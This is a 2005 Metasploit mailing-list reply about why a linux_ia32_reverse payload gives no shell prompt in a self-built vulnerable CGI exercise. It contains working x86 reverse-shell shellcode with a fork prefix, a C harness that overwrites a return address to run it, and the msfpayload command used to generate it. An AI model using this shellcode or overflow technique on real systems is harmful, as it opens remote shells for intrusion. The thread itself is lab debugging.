Metasploit mailing list archives
Can't seem to get a shell prompt from linux_ia32_reverse
From: mmiller at hick.org (mmiller at hick.org)
Date: Tue, 5 Apr 2005 17:18:29 -0500
On Tue, Apr 05, 2005 at 04:46:25PM -0400, John Wasser wrote:
As an exercise I created a CGI application (Apache under Fedora Core 3 Linux) with a buffer overflow vulnerability and a Metasploit exploit for it. The exploit works and the payload executes but when I use the linux_ia32_reverse payload I don't get a shell prompt. The Reverse Handler gets the connection but no prompt: Any suggestions?
I believe the fork code you added to PrependPayload must have had an error. Take the following sample code that simulates an exploit: #include <stdlib.h> #include <stdio.h> char sc[] = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x05\x6a\x01\x58\xcd\x80" "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x7f\x00\x00\x01\x66\x68" "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" "\x89\xe1\xb0\x0b\xcd\x80"; int main() { char buf[8]; *(unsigned int *)(buf + 12) = (unsigned int)(buf + 16); memcpy(buf + 16, sc, sizeof(sc) - 1); return 1; } All this code does is overwrite the return address of main with the address of the start of the shellcode (which comes immediately after the return address). The first line of the shellcode is a simple unoptimized fork/exit: 00000000 6A02 push byte +0x2 00000002 58 pop eax 00000003 CD80 int 0x80 00000005 85C0 test eax,eax 00000007 7405 jz 0xe 00000009 6A01 push byte +0x1 0000000B 58 pop eax 0000000C CD80 int 0x80 The shellcode then runs in the context of the child process and the parent process simply exits. When you request the above code as a CGI, the page returns an internal server error (as expected), but you receive a shell on 127.0.0.1:4444. The payload was generated using: $ ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 P If you're curious as to why you receive a connection but do not receive a shell from within the context of the CGI itself, you can strace the CGI process (add an artificial delay for testing purposes) to see where it's dying.
Current thread:
- Can't seem to get a shell prompt from linux_ia32_reverse John Wasser (Apr 05)
- <Possible follow-ups>
- Can't seem to get a shell prompt from linux_ia32_reverse mmiller at hick.org (Apr 05)
- Can't seem to get a shell prompt from linux_ia32_reverse John Wasser (Apr 06)